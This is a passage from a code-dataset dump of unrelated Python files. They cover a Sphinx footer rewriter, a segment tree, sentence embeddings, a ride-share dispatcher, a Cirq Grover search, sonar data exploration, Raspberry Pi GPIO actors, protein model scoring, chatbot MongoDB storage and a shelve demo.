TAB\ntab_init(\"xmp\");\ntab_init(\"exif\");\ntab_init(\"iptc\");\n\n\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"53870827","text":"\nimport sys\nimport glob\nimport re\n\n\ndef simplify_credits(html):\n    \"\"\"\n    Replace the credit part of the HTML footer. Return the new text.\n    \"\"\"\n    s = r\"Created using <a href=\\\"https://www\\.sphinx.+?Furo theme</a>.\"\n    pattern = re.compile(s, flags=re.DOTALL)\n\n    new_s = '<a href=\"https://creativecommons.org/licenses/by/4.0/\">CC BY 4.0</a>'\n    new_s += ' | Created using Sphinx & Furo'\n\n    return pattern.sub(new_s, html)\n\ndef main(path):\n    \"\"\"\n    Process the HTML files in path, save in place (side-effect).\n    \"\"\"\n    fnames = glob.glob(path.strip('/') + '/*.html')\n    for fname in fnames:\n        with open(fname, 'r+') as f:\n            html = f.read()\n\n            new_html = simplify_credits(html)\n\n            f.seek(0)\n            f.write(new_html)\n            f.truncate()\n    return\n\n\nif __name__ == '__main__':\n    _ = main(sys.argv[1])\n","sub_path":"docs/post_process_html.py","file_name":"post_process_html.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"320174486","text":"\nclass SegementTreeNode(object):\n\n    def __init__(self, begin, end):\n        self.val = 0\n        self.begin = begin\n        self.end = end\n        self.left = None\n        self.right = None\n\n\nclass SegementTree(object):\n\n    def __init__(self, l):\n        # build the tree over the whole input list\n        self.segTreeHead = self.buildSegmentTree(l, 0, len(l) - 1)\n\n    def buildSegmentTree(self, l, begin, end):\n        if begin == end:\n            node = SegementTreeNode(begin, end)\n            node.val = l[begin]\n            return node\n\n        node = SegementTreeNode(begin, end)\n        mid = (begin + end) // 2\n        node.left = self.buildSegmentTree(l, begin, mid)\n        node.right = self.buildSegmentTree(l, mid + 1, end)\n        node.val = node.left.val + node.right.val\n\n        return node\n\n    def updateVal(self, node, i, val):\n        if node.begin == node.end:\n            node.val = val\n        else:\n            mid = (node.begin + node.end) // 2\n\n            if i <= mid:\n                self.updateVal(node.left, i, val)\n\n            if i > mid:\n                self.updateVal(node.right, i, val)\n\n            node.val = node.left.val + node.right.val\n\n    def update(self, i, val):\n        self.updateVal(self.segTreeHead, i, val)\n\n    def getSum(self, node, begin, end):\n        # out-of-range or empty queries contribute nothing\n        if not node or begin > end or begin < node.begin or end > node.end:\n            return 0\n\n        if node.begin == begin and node.end == end:\n            return node.val\n\n        mid = (node.begin + node.end) // 2\n\n        if begin > mid:\n            return self.getSum(node.right, begin, end)\n\n        if end <= mid:\n            return self.getSum(node.left, begin, end)\n\n        return self.getSum(node.left, begin, mid) + self.getSum(node.right, mid + 1, end)\n","sub_path":"CCI/3/segmentTree.py","file_name":"segmentTree.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"360138618","text":"from typing import List\n\nimport numpy as np\nfrom nltk import tokenize\n\nfrom .word import WordVector\nfrom .idf import Idf\n\n\nclass SentenceVector:\n    def __init__(self):\n        self.word_model = WordVector()\n\n    def get_vecs(self, sentences: List[str]) -> np.ndarray:\n        idf_model = Idf(sentences)\n        result = []\n        for sent in sentences:\n            word_vecs = []\n            for word in tokenize.word_tokenize(sent):\n                vec = self.word_model.get_vec(word)\n                idf = idf_model.get_idf(word)\n                if vec is not None and idf is not None:\n                    vec = vec * idf\n                    word_vecs.append(vec)\n            result.append(np.mean(np.array(word_vecs), axis=0))\n        
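# each sentence embedding is the mean of its idf-weighted word vectors\n        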
return np.array(result)\n","sub_path":"src/embedding/sentence.py","file_name":"sentence.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"344767194","text":"from driver import Driver\nfrom rider import Rider\n\n\nclass Dispatcher:\n \"\"\"A dispatcher fulfills requests from riders and drivers for a\n ride-sharing service.\n\n When a rider requests a driver, the dispatcher assigns a driver to the\n rider. If no driver is available, the rider is placed on a waiting\n list for the next available driver. A rider that has not yet been\n picked up by a driver may cancel their request.\n\n When a driver requests a rider, the dispatcher assigns a rider from\n the waiting list to the driver. If there is no rider on the waiting list\n the dispatcher does nothing. Once a driver requests a rider, the driver\n is registered with the dispatcher, and will be used to fulfill future\n rider requests.\n \"\"\"\n # === Private Attributes ===\n # @type _events: PriorityQueue[Event]\n # A sequence of events arranged in priority determined by the event\n # sorting order.\n # @type _dispatcher: Dispatcher\n # The dispatcher associated with the simulation.\n\n def __init__(self):\n \"\"\"Initialize a Dispatcher.\n\n @type self: Dispatcher\n @rtype: None\n \"\"\"\n self._riders_waitlist = []\n self._available_drivers = []\n\n def __str__(self):\n \"\"\"Return a string representation.\n\n @type self: Dispatcher\n @rtype: str\n\n # Examples cannot be provided for the docstring because the location\n # module is not imported.\n \"\"\"\n return (\"Riders waiting list: {}, \"\n \"Available drivers: {}\").format(self._riders_waitlist,\n self._available_drivers)\n\n def request_driver(self, rider):\n \"\"\"Return a driver for the rider, or None if no driver is available.\n\n Add the rider to the waiting list if there is no available driver.\n\n @type self: Dispatcher\n @type rider: Rider\n @rtype: Driver | None\n\n # Examples cannot be provided for the docstring because the location\n # module is not imported.\n \"\"\"\n\n\n closest_driver = None\n # if no driver was found then add the rider to waitlist and return None.\n if len(self._available_drivers) == 0:\n self._riders_waitlist.append(rider)\n\n for driver in self._available_drivers:\n # if the the closest_driver is None then set it the closest_driver\n # to the first driver from the available_drivers list. 
If not\n # then find the closest driver(A.K.A fastest).\n if driver == self._available_drivers[0]:\n closest_driver = driver\n elif (driver.is_idle and\n driver.get_travel_time(rider.origin) <\n closest_driver.get_travel_time(rider.origin)):\n\n closest_driver = driver\n return closest_driver\n\n def request_rider(self, driver):\n \"\"\"Return a rider for the driver, or None if no rider is available.\n\n If this is a new driver, register the driver for future rider requests.\n\n @type self: Dispatcher\n @type driver: Driver\n @rtype: Rider | None\n\n # Examples cannot be provided for the docstring because the location\n # module is not imported.\n \"\"\"\n if driver not in self._available_drivers:\n self._available_drivers.append(driver)\n if len(self._riders_waitlist) > 0:\n # you remove the longest-waiting rider.\n return self._riders_waitlist.pop(0)\n return None\n\n def cancel_ride(self, rider):\n \"\"\"Cancel the ride for rider.\n\n @type self: Dispatcher\n @type rider: Rider\n @rtype: None\n\n # Examples cannot be provided for the docstring because the location\n # module is not imported.\n \"\"\"\n if rider in self._riders_waitlist:\n self._riders_waitlist.remove(rider)\n","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631874046","text":"import numpy as np\nimport cirq\n\nclass Grover:\n def __init__(self, n):\n self.n = n # Number of qubits\n self.index = 1#np.random.randint(pow(2, n)) # Choose random number in [0, 2^n) which is regarded as the \"solution\"\n self.qubits = cirq.LineQubit.range(2 * self.n) # All qubits\n self.q = self.qubits[0:self.n] # Grover work qubits\n self.a = self.qubits[self.n:self.n + 1] # Grover ancilla qubit\n self.t = self.qubits[self.n + 1:2 * self.n] # Toffoli ancilla qubits\n self.simulator = cirq.Simulator()\n self.measurement_reps = 1000\n\n def multi_toffoli(self, qins, qout, controls=None):\n # Array containing whether i-th qubit should have a 0-control (i.e. 
added X gates) or 1-control\n if controls is None: controls = np.ones(self.n) # If none specified, use default 1-controls\n\n G = []\n Xgates = []\n Cgates = []\n\n for i in range(len(qins)):\n if controls[i] == 0: Xgates.append(cirq.X.on(qins[i]))\n\n if len(qins) > 1: Cgates.append(cirq.TOFFOLI.on(qins[0], qins[1], self.t[0]))\n for i in range(2, len(qins)):\n Cgates.append(cirq.TOFFOLI.on(qins[i], self.t[i - 2], self.t[i - 1]))\n #for i in range(2, len(qins) - 1):\n # Cgates.append(cirq.TOFFOLI.on(qins[i], self.t[i - 2], self.t[i - 1]))\n\n G.append(Xgates)\n G.append(Cgates)\n if len(qins) > 1:\n G.append(cirq.CNOT.on(self.t[len(qins) - 2], qout))\n #G.append(cirq.TOFFOLI.on(qins[len(qins) - 1], self.t[len(qins) - 3], qout))\n else:\n G.append(cirq.CNOT.on(qins[0], qout))\n G.append(cirq.inverse(Cgates)) # Uncompute t-registers\n G.append(Xgates)\n\n return G\n\n def oracle(self):\n index_binary = np.array(list(bin(self.index)[2:].zfill(self.n))).astype(int)\n \n return self.multi_toffoli(self.q, self.a[0], controls=index_binary)\n \n def diffusion(self):\n G = [] # Gate list\n\n for i in range(self.n):\n G.append(cirq.H.on(self.q[i]))\n\n # 0-controlled Z on all work qubits\n G.append(cirq.X.on(self.q[-1]))\n G.append(cirq.H.on(self.q[-1]))\n G.append(self.multi_toffoli(self.q[:-1], self.q[-1], controls=np.zeros(self.n)))\n G.append(cirq.H.on(self.q[-1]))\n G.append(cirq.X.on(self.q[-1]))\n\n for i in range(self.n):\n G.append(cirq.H.on(self.q[i]))\n\n return G\n \n def search(self):\n circuit = cirq.Circuit()\n \n # Grover ancilla starts in |1> state\n circuit.append(cirq.X.on(self.a[0]))\n\n for i in range(self.n):\n circuit.append(cirq.H.on(self.q[i]))\n circuit.append(cirq.H.on(self.a[0]))\n\n grover_reps = int(np.round(np.pi / 4 * np.sqrt(pow(2, self.n))))\n\n for i in range(grover_reps):\n circuit.append(self.oracle())\n circuit.append(self.diffusion())\n \n circuit.append([cirq.measure(self.q[j], key='{}'.format(j)) for j in range(self.n)])\n\n sim_result = list(self.simulator.run(circuit, repetitions=self.measurement_reps).measurements.items())\n measurements = np.hstack([r for _, r in sim_result]).astype(np.int)\n results = measurements.dot(1 << np.arange(measurements.shape[-1] - 1, -1, -1)) # Convert binary to decimal\n\n print(measurements)\n print(results)\n\n accuracy = np.sum(results == self.index) / self.measurement_reps\n\n return accuracy\n\ngrover = Grover(3)\nprint(grover.index)\nprint(cirq.Circuit(grover.oracle()))\nprint(cirq.Circuit(grover.diffusion()))\nprint(grover.search())","sub_path":"Grover/Grover/Grover.py","file_name":"Grover.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"531327626","text":"import numpy as np\nimport scipy.stats as stats\nimport urllib2\nimport sys\nimport matplotlib.pylab as pylab\nimport pandas as pd\nfrom pandas import DataFrame\nfrom random import uniform\nfrom math import sqrt\nimport matplotlib.pyplot as plot\n\n# read data from UCI url\nurl = (\"http://archive.ics.uci.edu/ml/machine-learning-databases/undocumented/connectionist-bench/sonar/sonar.all-data\")\ndata = urllib2.urlopen(url)\n\n# 2.1 sizing upa new dataset\nxList = []\nlabels = []\nfor line in data:\n row = line.strip().split(\",\")\n xList.append(row)\nsys.stdout.write(\"Number of Rows of Data = \" + str(len(xList)) + '\\n')\nsys.stdout.write(\"Number of Columns of Data = \" + str(len(xList[1])) + '\\n')\n\n# 2.2 determine the nature of attributes\nnrow = 
len(xList)\nncol = len(xList[1])\ntype = [0]*3\ncolCounts = []\n\nfor col in range(ncol):\n for row in xList:\n try:\n a = float (row[col])\n if isinstance(a, float):\n type[0] += 1\n except ValueError:\n if len(row[col]) > 0:\n type[1] += 1\n else:\n type[2] += 1\n colCounts.append(type)\n type = [0]*3\nsys.stdout.write(\"Col#\" + '\\t' + \"Number\" + '\\t' + \"Strings\" + '\\t ' + \"Other\\n\")\niCol = 0\nfor types in colCounts:\n sys.stdout.write(str(iCol) + '\\t\\t' + str(types[0]) + '\\t\\t' + str(types[1]) + '\\t\\t' + str(types[2]) + \"\\n\")\n iCol += 1\n\n# 2.3 Summary Statistics for numeric and categorical attributes\ncol = 3\ncolData = []\nfor row in xList:\n colData.append(float(row[col]))\ncolArray = np.array(colData)\ncolMean = np.mean(colArray)\ncolsd = np.std(colArray)\nsys.stdout.write(\"Mean = \" + '\\t' + str(colMean) + '\\t\\t' + \"Standard Deviation = \" + '\\t ' + str(colsd) + \"\\n\")\n\n#calculate quantile boundaries\nntiles = 4\npercentBdry = []\nfor i in range(ntiles+1):\n percentBdry.append(np.percentile(colArray, i*(100)/ntiles))\nsys.stdout.write(\"\\nBoundaries for 4 Equal Percentiles \\n\")\nprint(percentBdry)\nsys.stdout.write(\" \\n\")\n\n#run again with 10 equal intervals\nntiles = 10\npercentBdry = []\nfor i in range(ntiles+1):\n percentBdry.append(np.percentile(colArray, i*(100)/ntiles))\nsys.stdout.write(\"Boundaries for 10 Equal Percentiles \\n\")\nprint(percentBdry)\nsys.stdout.write(\" \\n\")\n\n#The last column contains categorical variables\ncol = 60\ncolData = []\nfor row in xList:\n colData.append(row[col])\nunique = set(colData)\nsys.stdout.write(\"Unique Label Values \\n\")\nprint(unique)\n\n#count up the number of elements having each value\ncatDict = dict(zip(list(unique),range(len(unique))))\ncatCount = [0]*2\nfor elt in colData:\n catCount[catDict[elt]] += 1\nsys.stdout.write(\"\\nCounts for Each Value of Categorical Label \\n\")\nprint(list(unique))\nprint(catCount)\n\n# 2.4 QQ plot using pylab\ncol = 3\ncolData = []\nfor row in xList:\n colData.append(float(row[col]))\nstats.probplot(colData, dist=\"norm\", plot=pylab)\npylab.title(\"Probability Plot\")\npylab.show()\n\n# 2.5 using pandas to read and summarize data\nrocksVMines = pd.read_csv(url,header=None, prefix=\"V\")\n\n#print head and tail of data frame\nprint(rocksVMines.head())\nprint(rocksVMines.tail())\n\n#print summary of data frame\nsummary = rocksVMines.describe()\nprint(summary)\n\n# 2.6 parallel coordinates graph for attributes visualization\n#assign color for M and R\nfor i in range(208):\n if rocksVMines.iat[i,60] == \"M\":\n pcolor = \"red\"\n else:\n pcolor = \"blue\"\n dataRow = rocksVMines.iloc[i,0:60]\n dataRow.plot(color=pcolor)\nplot.xlabel(\"Attribute Index\")\nplot.ylabel((\"Attribute Values\"))\nplot.show()\n\n# 2.7 cross plotting pairs of attributes\ndataCol2 = rocksVMines.iloc[:,1]\ndataCol3 = rocksVMines.iloc[:,2]\nplot.scatter(dataCol2, dataCol3)\nplot.title(\"Correlation bettween 2nd and 3rd attributes\")\nplot.xlabel(\"2nd Attribute\")\nplot.ylabel((\"3rd Attribute\"))\nplot.show()\n\ndataCol21 = rocksVMines.iloc[:,20]\nplot.scatter(dataCol2, dataCol21)\nplot.title(\"Correlation bettween 2nd and 21st attributes\")\nplot.xlabel(\"2nd Attribute\")\nplot.ylabel((\"21st Attribute\"))\nplot.show()\n\n# 2.8 correlation between classification target and real attribute\ntarget = []\nfor i in range(208):\n if rocksVMines.iat[i,60] == \"M\":\n target.append(1.0)\n else:\n target.append(0.0)\ndataRow = rocksVMines.iloc[:, 35]\nplot.scatter(dataRow, 
target)\nplot.xlabel(\"Attribute Value\")\nplot.ylabel(\"Target Value\")\nplot.show()\n\ntarget = []\nfor i in range(208):\n if rocksVMines.iat[i, 60] == \"M\":\n target.append(1.0 + uniform(-0.1, 0.1))\n else:\n target.append(0.0 + uniform(-0.1, 0.1))\ndataRow = rocksVMines.iloc[:, 35]\nplot.scatter(dataRow, target, alpha=0.5, s=120)\nplot.xlabel(\"Attribute Value\")\nplot.ylabel(\"Target Value\")\nplot.show()\n\n# 2.9 Pearson Correlation\n#calculate correlations between real-valued attributes\ndataRow2 = rocksVMines.iloc[0:60,1]\ndataRow3 = rocksVMines.iloc[0:60,2]\ndataRow21 = rocksVMines.iloc[0:60,20]\nmean2 = 0.0; mean3 = 0.0; mean21 = 0.0\nnumElt = len(dataRow2)\nfor i in range(numElt):\n mean2 += dataRow2[i]/numElt\n mean3 += dataRow3[i]/numElt\n mean21 += dataRow21[i]/numElt\n var2 = 0.0; var3 = 0.0; var21 = 0.0\nfor i in range(numElt):\n var2 += (dataRow2[i] - mean2) * (dataRow2[i] - mean2)/numElt\n var3 += (dataRow3[i] - mean3) * (dataRow3[i] - mean3)/numElt\n var21 += (dataRow21[i] - mean21) * (dataRow21[i] - mean21)/numElt\n corr23 = 0.0; corr221 = 0.0\nfor i in range(numElt):\n corr23 += (dataRow2[i] - mean2) * \\\n (dataRow3[i] - mean3) / (sqrt(var2*var3) * numElt)\n corr221 += (dataRow2[i] - mean2) * \\\n (dataRow21[i] - mean21) / (sqrt(var2*var21) * numElt)\nsys.stdout.write(\"Correlation between attribute 2 and 3 \\n\")\nprint(corr23)\nsys.stdout.write(\" \\n\")\nsys.stdout.write(\"Correlation between attribute 2 and 21 \\n\")\nprint(corr221)\nsys.stdout.write(\" \\n\")\n\n# 2.10 presenting attribute correlation visually\ncorMat = DataFrame(rocksVMines.corr())\n#visualize correlations using heatmap\nplot.pcolor(corMat)\nplot.show()\n\nprint(\"My name is Yuxin Sun\")\nprint(\"My NetID is: yuxins5\")\nprint(\"I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.\")\n","sub_path":"HW3.py","file_name":"HW3.py","file_ext":"py","file_size_in_byte":6105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"54959962","text":"from numpy import *\na = [[ 1., 0., 0.],\n [ 0., 1., 2.]]\na = array(a)\na.ndim\na.size\na.shape\na.dtype\na.itemsize\na.data\n\na.shape = (3,2)\na\na.transpose()\na\nNone is newaxis\n\nc = arange(12)\nc\n\nid(b)\n","sub_path":"code/nmptst.py","file_name":"nmptst.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"333021048","text":"import add_import_path # only for examples\n\nfrom aktos_dcs import *\nfrom aktos_dcs_lib import *\n\nclass Test(Actor):\n def handle_IoMessage(self, msg):\n print(\"Got message: %s\", msg[\"val\"])\n\n def action(self):\n val = False\n while True:\n sleep(2)\n print(\"sending value: %s\" % val)\n self.send({'IoMessage': {'pin_name': 'test-output-1', 'val': val}})\n val = not val\n\nif __name__ == \"__main__\":\n \"\"\"\n electrical connection:\n led.+ : rpi.gpio.2\n led.- : rpi.gnd\n button.a : rpi.gnd\n button.b : rpi.gpio.3\n \"\"\"\n\n output_pins = {\n 'test-output-1': 2,\n }\n input_pins = {\n 'test-input-1': 3,\n }\n\n for k, v in input_pins.items():\n GPIOInputActor(pin_name=k, pin_number=v, invert=True)\n\n for k, v in output_pins.items():\n GPIOOutputActor(pin_name=k, pin_number=v, initial=True)\n\n ProxyActor()\n Test()\n\n 
wait_all()\n\n","sub_path":"examples/rpi-led-button-example.py","file_name":"rpi-led-button-example.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297417151","text":"#! /usr/bin/env python\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport pandas as pd\nfrom ggplot import *\n\nprint(\"\"\"\nThe important columns are:\n'sample' = uniq label of the sample of the 131 considered,\n'filename' = which model of that sample\n'rmsd', = distance to native structure\n'Renergy', = Rosetta energy of that model\n'nativeFlag' = == true if fn ends with .pdb, else False\n'Entropy', = entropy calculated from (nx7) predicted marginal entropy files, once with setting many chis to szero, once just summing over all of them.\n\"\"\")\n\ndf = pd.DataFrame()\n\nfor fn in [\"Rosetta+PoPEv2_sumAllVer.pkl\", \"Rosetta+PoPEv2_nullsetzVer.pkl\", \"Rosetta+PoPEv2_nullLearnedVer.pkl\",\n \"Rosetta+PoPEv3_nullLearnedVer.pkl\", \"Rosetta+PoPEv3.2.pkl\", \"Rosetta+PoPEv4.1.pkl\"]:\n E = np.load(\"../data/\" + fn)\n\n # normalize energies,entropies\n # E[\"Renergy_nmd\"] = E.groupby('sample')[\"Renergy\"].transform(lambda x: (x - x.mean()) / x.std())\n # E[\"Entropy_nmd\"] = E.groupby('sample')[\"Entropy\"].transform(lambda x: (x - x.mean()) / x.std())\n E.reset_index(inplace=True)\n # print(E.columns)\n # print(E.head())\n E_native = E[E.nativeFlag]\n E = E[np.logical_not(E.nativeFlag)]\n E = pd.merge(E,\n E.groupby('sample').apply(lambda x: x.loc[x['rmsd'].idxmin()]), on='sample', suffixes=('', '_best'))\n\n E = pd.merge(E, E_native, on='sample', suffixes=('', '_native'))\n df = df.append(pd.DataFrame(\n {'dH_best': E.Renergy_best - E.Renergy, 'dS_best': E.Entropy_best - E.Entropy, 'filename': E.filename,\n 'ver': fn,\n 'rmsd': E.rmsd, 'rmsd_best': E.rmsd_best, 'protein': E['sample'], 'dH_native': E.Renergy_native - E.Renergy,\n 'dS_native': E.Entropy_best - E.Entropy, 'rmsd_native': E.rmsd_native}))\n\nfor i in range(10):\n df = df.append(pd.DataFrame(\n {'dH_best': E.Renergy_best - E.Renergy, 'dS_best': np.random.randn(len(E.Renergy_best)), 'filename': E.filename,\n 'ver': 'rand{}'.format(i), 'rmsd': E.rmsd, 'rmsd_best': E.rmsd_best, 'protein': E['sample'],\n 'dH_native': E.Renergy_native - E.Renergy,\n 'dS_native': np.random.randn(len(E.Renergy_best)), 'rmsd_native': E.rmsd_native}))\n\ndf.reset_index(inplace=True)\np = ggplot(aes(x='dH_native', y='dS_native', colour='ver'), data=df) + \\\n geom_point(alpha=0.5, size=20) + theme_bw() + stat_smooth(method=\"loess\", span=0.1)\nprint(p)\n\ndf = df[df.dH != 0]\ndf.reset_index(inplace=True)\np = ggplot(aes(x='dH_best', y='dS_best', colour='ver'), data=df) + \\\n geom_point(alpha=0.5, size=20) + theme_bw() + stat_smooth(method=\"loess\", span=0.1)\nprint(p)\n\ndf.reset_index(inplace=True)\n\ngrouped = df.groupby(['protein', 'ver'])\n\n\ndef find_optimal_temperature(df3):\n df3 = df3.copy()\n df3['alpha'] = np.arctan(df3.dS_native / df3.dH_native)\n df3['sign'] = np.sign(df3.dH_native)\n df3.sort_values(by='alpha', ascending=False, inplace=True)\n df3 = df3.assign(disc=df3['sign'].cumsum() + sum(df3['sign'] < 0))\n idx_max = df3['disc'].idxmax()\n idx_min = df3['disc'].idxmin()\n disc_max = df3.loc[idx_max, 'disc']\n disc_min = df3.shape[0] - df3.loc[idx_min, 'disc']\n res = pd.DataFrame(\n dict(alpha=[df3.loc[idx_max, 'alpha']], disc=disc_max) if disc_max > disc_min else\n dict(alpha=[df3.loc[idx_min, 'alpha'] + np.pi], 
disc=disc_min))\n res['of'] = df3.shape[0]\n res['f'] = res.disc / res.of\n return res\n\n\ndf2 = grouped.apply(find_optimal_temperature).reset_index()\n\nggplot(df2, aes(x='ver', y='alpha')) + geom_point()\n\ndf2.groupby('ver')['f'].mean()\ndf2.groupby(['ver'])['f'].aggregate(lambda x: np.mean(np.equal(x, 1.0))).reset_index()\ndf2.groupby(['ver'])['f'].aggregate(lambda x: np.sum(np.equal(x, 1.0))).reset_index()\n\nimport seaborn as sns\n\ndf2['alpha'] -= (df2['alpha'] > 1.5) * np.pi\nsns.boxplot(x=\"ver\", y=\"alpha\", data=df2)\n","sub_path":"load_test_protein_data.py","file_name":"load_test_protein_data.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"201578495","text":"from programr.config.bot.mongodbstorage import BotConversationsMongodbStorageConfiguration\nfrom programr.dialog.storage.base import ConversationStorage\nfrom programr.utils.logging.ylogger import YLogger\nimport datetime\nimport pymongo\nfrom pymongo import MongoClient, IndexModel\n\n\nclass ConversationMongodbStorage(ConversationStorage):\n\n def __init__(self, config: BotConversationsMongodbStorageConfiguration):\n super().__init__(config)\n # client = MongoClient(\"10.0.75.2\", 27017)\n client = MongoClient(config.host, config.port, serverSelectionTimeoutMS=2000)\n self._config = config\n\n try:\n if not config.name in client.list_database_names():\n YLogger.info(self, \"Database doesn't exist make a new one!\")\n print(\"Database doesn't exist make a new one!\")\n\n self.db = client[config.name]\n except:\n YLogger.warning(self, \"No Mongo Database was found. No conversation will be saved\")\n print(\"No Mongo Database was found. No conversation will be saved\")\n\n def save_conversation(self, client_context):\n userid = client_context.userid\n bot_properties = client_context.bot.conversations[userid].properties\n questions = client_context.bot.conversations[userid].questions\n answers = client_context.bot.conversations[userid].answers\n\n try:\n last_question = questions[-1].sentences\n except Exception as e:\n YLogger.exception(self, \"question sentences length is zero\", e)\n raise e\n\n try:\n last_sentiment_value = client_context.bot.sentiment.last_sentiment_value\n except Exception as e:\n # print(\"Exception caught for last_sentiment_value: {}\".format(e))\n last_sentiment_value = None\n\n try:\n last_fer_value = client_context.bot.facial_expression_recognition.last_fer_value\n except Exception as e:\n # print(\"Exception caught for last_fer_value: {}\".format(e))\n last_fer_value = None\n\n try:\n last_final_sentiment_value = client_context.bot.sentiment.last_final_sentiment_value\n except Exception as e:\n # print(\"Exception caught for last_final_sentiment_value: {}\".format(e))\n last_final_sentiment_value = None\n\n try:\n # todo this doesn't handle good when sentence is empty\n last_answer = answers[-1].sentences\n except Exception as e:\n YLogger.exception(self, \"answer sentences length is zero\", e)\n raise e\n\n try:\n image_filename = answers[-1].robot[0]['robot']['image']['filename']\n except Exception as e:\n image_filename = None\n\n try:\n duration = answers[-1].robot[0]['robot']['image']['duration']\n except Exception as e:\n duration = None\n\n try:\n video_filename = answers[-1].robot[0]['robot']['video']['filename']\n except Exception as e:\n video_filename = None\n\n try:\n session_number = bot_properties[\"session_number\"]\n except Exception as e:\n session_number = None\n\n try:\n 
username = bot_properties[\"username\"]\n except Exception as e:\n username = None\n\n question_sentence_text, answer_sentence_text = self.create_conversation(last_question, last_answer)\n\n # print(\"last sentiment: \", last_sentiment_value)\n # print(\"final_sentiment_value: \", last_final_sentiment_value)\n\n document = {\"conversation\": {\n \"question\": question_sentence_text,\n \"answer\": answer_sentence_text,\n \"timestamp\": datetime.datetime.now(),\n \"sentiment\": last_sentiment_value,\n \"fer\": last_fer_value,\n \"final_sentiment_value\": last_final_sentiment_value\n },\n\n \"session_info\": {\n \"session_number\": session_number,\n \"username\": username\n },\n\n \"image\": {\n \"filename\": image_filename,\n \"duration\": duration,\n },\n\n \"video\": {\n \"filename\": video_filename\n }\n\n }\n try:\n # writing to db\n self.db[self._config.collection_name].insert_one(document)\n except Exception as e:\n YLogger.error(self, e)\n\n def save_client_properties(self, client_context):\n # TODO: save client_context.bot.conversations[userid].properties to MongoDB document\n userid = client_context.userid\n bot_properties = client_context.bot.conversations[userid].properties\n print(\"bot_properties: {}\".format(type(bot_properties)))\n\n if self.db['user_info'].find_one({'userid': client_context.userid}) is not None:\n print(\"Found user\")\n # user_info = self.db['user_info'].find_one({'userid': client_context.userid})\n\n self.db['user_info'].update_one({'userid': client_context.userid}, { '$set': {'variables': bot_properties} })\n print(\"Finished saving info\")\n else:\n print(\"user not found. nothing saved.\")\n\n def load_client_properties(self, client_context):\n try:\n if self.db['user_info'].find_one({'userid': client_context.userid}) is not None:\n # print(\"Found user\")\n user_info = self.db['user_info'].find_one({'userid': client_context.userid})\n # print(\"user name: {}\".format(user_info['name']))\n # print(\"user location: {}\".format(user_info['location']))\n # print(\"user time zone: {}\".format(user_info['time zone']))\n client_context.load_client_properties(user_info['name'], user_info['location'], user_info['time zone'])\n # self.user_name = user_info['name']\n # self.location = user_info['location']\n # self.time_zone = user_info['time zone']\n else:\n # print(\"Writing new user to database\")\n document = {\n \"userid\": client_context.userid,\n \"name\": \"Unknown\",\n \"location\": \"Unknown\", \n \"time zone\": \"Unknown\"\n }\n # self.db['user_info'].insert_one(document)\n # return user_info\n except Exception as e:\n YLogger.error(self, e)\n\n def load_conversation(self, conversation, clientid, restore_last_topic=False):\n # todo needs loading the whole conversation with properties\n # needs more work\n pass\n\n def empty(self):\n self.db[self._config.collection_name].drop()\n\n def create_conversation(self, question, answer):\n question_sentence_text = \"\"\n for question_sentence in question:\n try:\n if question_sentence.words[-1].endswith('?') or question_sentence.words[-1].endswith(')'):\n end_sign = \"\"\n else:\n end_sign = \". \"\n except Exception as e:\n YLogger.exception(self, \"Failed to get end_sign \", e)\n\n question_sentence_text += \" \".join(question_sentence.words) + end_sign\n\n answer_sentence_text = \"\"\n for answer_sentence in answer:\n try:\n if answer_sentence.words[-1].endswith('?') or answer_sentence.words[-1].endswith(')'):\n end_sign = \"\"\n else:\n end_sign = \". 
\"\n            except Exception as e:\n                YLogger.exception(self, \"Failed to get end_sign \", e)\n\n            answer_sentence_text += \" \".join(answer_sentence.words) + end_sign\n\n        return question_sentence_text, answer_sentence_text\n","sub_path":"src/programr/dialog/storage/mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":7795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9807839","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 20 09:09:02 2016\n\n@author: snewns\n\"\"\"\n\n'''Shelf module intro/demo'''\nimport shelve\n\n##Pass a filename to the shelfFile to store the shelf value in a variable\nshelfFile = shelve.open('shelfData')\n\n##Create a list\ncats = ['Sophie', 'Pooka', 'Simon']\n\n##Treat ShelfFile as a dictionary --> key of CATS had a value of cats list\nshelfFile['cats'] = cats\n\n##Close the file, and the shelf value (cats list) is stored in ShelfFile\nshelfFile.close()\n\n##Will see 3 files (.bak, .dat, .dir) which are binary files that contain the \n##data we stored in the shelf\n\n##re-open the shelf value (will be in both read + write mode)\nshelfFile = shelve.open('shelfData')\nprint(type(shelfFile))\n\n##Print the stored list from above\nprint(shelfFile['cats'])\n\n##See the keys + 